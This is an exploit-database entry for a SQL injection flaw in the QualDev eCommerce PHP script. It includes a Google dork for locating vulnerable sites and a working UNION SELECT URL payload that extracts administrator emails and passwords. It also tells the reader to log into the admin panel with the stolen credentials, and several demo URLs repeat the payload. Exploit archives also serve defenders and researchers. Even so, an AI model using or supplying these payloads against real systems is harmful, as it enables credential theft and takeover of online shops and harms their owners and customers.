QualDev eCommerce script – SQL Injection

• Exploit Database
• 31 阅读

• 作者： ErrNick
  日期： 2010-12-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15748/

• ====================================================
  QualDev eCommerce script SQL injection vulnerability
  ====================================================
  
  
  # Exploit Title: QualDev eCommerce script SQL injection vulnerability
  # Vendor: http://www.qualdev.com
  # Date: 15.12.2010
  # Version: all version
  # Category:: webapps
  # Google dork: inurl:"index.php?file=allfile"
  # Tested on: FreeBSD 7.1
  # Author: ErrNick
  # Site: XakNet.ru, forum.xaknet.ru
  # Contact: errnick[at]xaknet[dot]ru
  # Greatz 2 all memberz of XakNet team ( X1mk0~, Saint, baltazar, SHYLLER,
  Kronus, mst && others)
  
  # Intro:
  
  - A parameter is not properly sanitised beforebeing used in a SQL query.
  - Inputpassed to "id"parameterisnotproperly
  - sanitised before being used in a SQL query.Thiscan be
  - exploitedtomanipulateSQL queries by injecting
  - arbitrary SQL code.
  
  # Exploit:
  
  
  index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
  
  logining with admin email && password there
  http://victim/adminpanel/
  
  #Demo:
  
  -
  http://www.site.com/index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
  -
  http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
  -
  http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
  
  
  Vizit us at http://xaknet.ru